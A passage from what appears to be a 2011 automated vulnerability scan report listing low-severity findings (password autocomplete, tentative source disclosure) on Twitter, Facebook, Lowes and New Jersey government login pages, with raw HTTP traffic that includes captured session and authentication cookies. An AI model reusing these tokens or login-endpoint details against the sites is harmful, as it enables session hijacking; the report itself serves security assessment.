User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cookie: k=173.193.214.243.1310522711741462; guest_id=v1%3A131052271223855296; _twitter_sess=BAh7CjoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwixoD0hMQE6%250AB2lkIiU5OWExZDRmMWUzN2U3MzU3MTZiMTI2Zjc0NDNmODVhNzoMY3NyZl9p%250AZCIlY2FhNmZmMWMzY2YwMWUxNTYyYWQ4NzgyMGRmMGJlMTgiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA%253D--50bfdb52e14835d473c0b9478dd99f22193f449a; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utma=43838368.1509851687.1310522719.1310522719.1310522719.1; __utmb=43838368.4.10.1310522719; __utmc=43838368; __utmz=43838368.1310522719.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:06:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310522800-71865-3084
ETag: "605d04975bd04dbcd5af5dbcf382d8c9"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 02:06:40 GMT
X-Runtime: 0.03641
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: ee9849c5dfc40ffaec37fd046b2f29f18a437fd8
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 14650
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div class="wrapper">

<form action="https://twitter.com/sessions" class="signin" method="post"><div style="margin:0;padding:0">
...[SNIP]...
<td><input id="password" name="session[password]" type="password" value="" /> <small>
...[SNIP]...

8.10. http://visitnj.org/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://visitnj.org
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS5d506fc80e0e90dcab3fa28ac30949e1=s7maojbbsjalvugal99t5oad66; expires=Fri, 05-Aug-2011 05:24:35 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 21:24:03 GMT
ETag: "b64f70a6778aaba742ca2cb12822f6ab"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><head>
<meta
...[SNIP]...
<div id="inj-user-login-floater-inner"><form action="/" accept-charset="UTF-8" method="post" id="user-login" class="fancy">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
</div>
...[SNIP]...

8.11. http://www.facebook.com/NewJerseyLottery  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /NewJerseyLottery

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /NewJerseyLottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=I_ocTk6Zw7qrIicWqdkAsyEn; expires=Fri, 12-Jul-2013 01:51:31 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=pn98H; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FNewJerseyLottery; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FNewJerseyLottery; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.10.42
Connection: close
Date: Wed, 13 Jul 2011 01:51:31 GMT
Content-Length: 34241

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

8.12. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /webapp/wcs/stores/servlet/LogonForm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63497
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Wed, 13-Jul-2011 02:33:05 GMT
Set-Cookie: TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; Path=/
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<br /> -->


<form method="post" name="Logon" action="Logon" id="Logon">
<input type="hidden" name="storeId" value="10151" id="WC_UserLogonForm_FormInput_storeId_In_Logon_1"/>
...[SNIP]...
<div class="form-input-block">
<input class="small" type="password" name="logonPassword" value="" id="logonPassword" onfocus="this.onkeypress = pressEnter;" />
</div>
...[SNIP]...

8.13. http://www.state.nj.us/lottery/games/1-0_numbers_draw_games.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/games/1-0_numbers_draw_games.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /lottery/games/1-0_numbers_draw_games.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:18 GMT
Content-length: 13087
Content-type: text/html
Last-modified: Mon, 11 Jul 2011 19:14:37 GMT
Etag: "331f-4e1b4b9d"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<div id="lower-login">
<form id="login-form"name="login" action="https://www6.state.nj.us/LOT_LVC/LogAndLoad" method="post">
<input name="email" type="text" class="login" maxlength="40" /><input name="password" type="password" class="login" maxlength="30" />
</form>
...[SNIP]...

8.14. http://www.state.nj.us/lottery/home.shtml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/home.shtml

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /lottery/home.shtml HTTP/1.1
Host: www.state.nj.us
Proxy-Connection: keep-alive
Referer: http://www.state.nj.us/lottery/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=8B7AC0DFAC1D241DA769612C928B4D1F|portal20.sa.state.nj.us|/|iplanet; %2Fselfserviceportal20.sa.state.nj.us_JSESSIONID=CA18EEAFF644FACB71077AFF38C6D49C|portal20.sa.state.nj.us|/selfservice|iplanet; %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4SfczfjhoFFDpWNk0ih9CnFjKv6RlTaRw0JXs%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:44:23 GMT
Content-type: text/html
Connection: close
Content-Length: 14669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="vip-content">
<form id="login-form"name="login" action="https://www6.state.nj.us/LOT_LVC/LogAndLoad" method="post">
<input name="email" type="text" class="login" maxlength="40" /><input name="password" type="password" class="login" maxlength="30" />
</form>
...[SNIP]...

8.15. http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/vip/3-0_vip_gen_info.htm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /lottery/vip/3-0_vip_gen_info.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:22 GMT
Content-length: 14721
Content-type: text/html
Last-modified: Mon, 11 Jul 2011 12:47:20 GMT
Etag: "3981-4e1af0d8"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<div class="viplogin">
<form name="login" action="https://www6.state.nj.us/LOT_LVC/LogAndLoad" method="post">
               <input name="email" type="text" size="20" maxlength="40" />    
               <input name="password" type="password" size="20" maxlength="30" />
               <table width="327" height="24" border="0" cellspacing="0">
...[SNIP]...

8.16. http://www.visitnj.org/events  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.visitnj.org
Path:   /events

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /events HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS52105c49ef60fb52c401d408f7374085=3vi18nog2bhk3ks4oft736i4p6; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 21:24:26 GMT
ETag: "1c02c8d04dbc4f40ed09302c3263264b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><head>
<meta
...[SNIP]...
<div id="inj-user-login-floater-inner"><form action="/events" accept-charset="UTF-8" method="post" id="user-login" class="fancy">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
</div>
...[SNIP]...

8.17. http://www.visitnj.org/new-jerseys-wineries  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.visitnj.org
Path:   /new-jerseys-wineries

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /new-jerseys-wineries HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS52105c49ef60fb52c401d408f7374085=ordncjvbe1of8k89jthuie26j7; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 22:00:07 GMT
ETag: "fcfdc2bb205847c6a67cce0b8add1bc2"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42712

<table align="center" border="1" cellspacing="0" style="background:white;color:black;width:80%;"><tr><th colspan="2"> Database Error</th></tr>
<tr><td align="right" valign="top">Message:</td><td>[<b>M
...[SNIP]...
<div id="inj-user-login-floater-inner"><form action="/new-jerseys-wineries" accept-charset="UTF-8" method="post" id="user-login" class="fancy">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
</div>
...[SNIP]...

8.18. https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www1.state.nj.us
Path:   /TYTR_Saver/jsp/common/Login.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /TYTR_Saver/jsp/common/Login.jsp HTTP/1.1
Host: www1.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:45 GMT
Content-type: text/html
Set-cookie: JSESSIONID=212f7dfab86ed2f492b92e02d519;Path=/TYTR_Saver
Set-cookie: JROUTE=Wr84;Path=/TYTR_Saver
Connection: close


<HTML>
<head>
<!--
<TITLE>File Your NJ SAVER Online! - NJ Taxation</TITLE>
-->
<TITLE>File Your Homestead Benefit Online</TITLE>
<!--<LINK REL="stylesheet" HREF
...[SNIP]...
</table>

<form method="POST" action="/TYTR_Saver/servlet/common/Login" NAME="Login">

<table width="90%" align="center">
...[SNIP]...
<td align="left" valign="top" width="28%">
<input class="inputTxt" name="pin" type="password" maxlength=4 size=4>
<font class="asterisk">
...[SNIP]...

8.19. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www6.state.nj.us
Path:   /LOT_LVC/jsp/lvc1_0_vip_reg.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /LOT_LVC/jsp/lvc1_0_vip_reg.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:47 GMT
Content-type: text/html;charset=ISO-8859-1
Set-cookie: JSESSIONID=C2D1D22C30B568638365FC0BBB7F4E87;Path=/LOT_LVC;Secure
Set-cookie: JROUTE=LbS7;Path=/LOT_LVC;Secure
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!--End Validation -->


   <form name="registration" onSubmit="return Validate();" method="post" action="/LOT_LVC/Write_Reg">    


   <p class="style4 style1 stepHeader">
...[SNIP]...
<span class="fieldName">
    <input type="password" name="password" class="input_bg" size="30" maxlength="20" value= >
</span>
...[SNIP]...
<span class="fieldName">
    <input type="password" name="password_confirm" class="input_bg" size="30" maxlength="20" value= >

</span>
...[SNIP]...

8.20. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www6.state.nj.us
Path:   /LOT_LVC/jsp/lvc1_S0_login.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /LOT_LVC/jsp/lvc1_S0_login.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:47 GMT
Content-type: text/html;charset=ISO-8859-1
Set-cookie: JSESSIONID=16461B7951076D32FDBB1BA8E456A263;Path=/LOT_LVC;Secure
Set-cookie: JROUTE=LbS7;Path=/LOT_LVC;Secure
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="177" align="center" valign="top">
<form action="/LOT_LVC/LogAndLoad" method="post" name="login" id="login">
<div align="center">
...[SNIP]...
<br />
<input type="password" name="password" maxlength="30" size="20" />
</div>
...[SNIP]...

9. Source code disclosure  previous  next
There are 2 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


9.1. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes; akaau=1310524386~id=21017306f05776f813565f0d22f0d790

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 07 Jul 2011 16:52:15 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 116111
Expires: Wed, 13 Jul 2011 02:03:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:11 GMT
Connection: keep-alive
Vary: Accept-Encoding

/*
This is to ensure that a console object is always available as well as it...s many methods.
*/

if (!window.console || !console.firebug){
var methods = ["log", "debug", "info", "warn", "error"
...[SNIP]...
s subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.Cookie
* @Author WCope
* @version <%=VERSION=%>
*/

(function(){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   /**
    * Class for working with browser cookies. Simplifies setting, getting, deleting
   *
    * @
...[SNIP]...
is subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.Prefs
* @Author Wcope
* @version <%=VERSION=%>
*/

(function(){
// Grab Lowes namespace object or create a new one.
var Lowes = window.Lowes || {};

/**
   * Simplified Cookie based preferences for users
   */
var Prefs = {
    // Store
...[SNIP]...
is subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.Utils
* @Author WCope
* @version <%=VERSION=%>
*/

(function(){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};
   
   Lowes.PageTypes = {
       Other        : 0,
       List        : 1,
       Details        : 2,
       Category    : 3
   };
   
   var Util
...[SNIP]...
hout Lowes.com's written consent.
*/

/**
* Lowes.UI Namespace Object that will be the parent of all
* Lowes UI components library classes.    
*
* @Package: Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};


   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Sil
...[SNIP]...
Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Accordion
* @member Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};
   
   // Qui
...[SNIP]...
m Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Carousel
* @member Lowes.UI
* @Author MHead
* @version <%=VERSION=%>
*/
;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};
   
   // Quic
...[SNIP]...
.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Modal
* @member Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};
   
   // Qui
...[SNIP]...
s.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Tabs
* @member Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};
   
   // Qui
...[SNIP]...
Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Slideshow
* @member Lowes.UI
* @Author MHead
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};
   
   // Qui
...[SNIP]...

9.2. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
